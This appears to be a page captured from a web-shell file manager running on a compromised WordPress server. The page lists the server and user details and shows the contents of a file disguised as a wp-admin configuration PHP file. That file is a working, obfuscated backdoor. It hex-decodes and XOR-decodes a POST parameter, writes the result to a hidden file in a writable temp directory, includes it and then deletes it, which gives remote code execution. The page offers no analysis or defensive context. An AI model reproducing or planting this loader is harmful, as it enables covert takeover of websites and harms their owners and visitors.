HEX
Server: Apache/2
System: Linux sv.lamweb.online 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
User: pnvtravel (1011)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/pnvtravel/domains/pnvtravel.com/private_html/wp-admin/config.1770309955.php
<!--Anc344QN-->
<?php

if(count($_POST) > 0 && isset($_POST["\x65\x6Et"])){
$record = array_filter([sys_get_temp_dir(), "/dev/shm", "/var/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/tmp"]);
$ref = hex2bin($_POST["\x65\x6Et"]);
$descriptor    =     ''   ;      $m=0;do{$descriptor.=chr(ord($ref[$m])^67);$m++;}while($m<strlen($ref));
for ($k = 0, $val = count($record); $k < $val; $k++) {
    $sym = $record[$k];
            if (max(0, is_dir($sym) * is_writable($sym))) {
            $pgrp = sprintf("%s/.value", $sym);
            if ($binding = fopen($pgrp, 'w')) {
    if (fwrite($binding, $descriptor) !== false) {
        fclose($binding);
        include $pgrp;
        @unlink($pgrp);
        exit;
    }
}
        }
}
}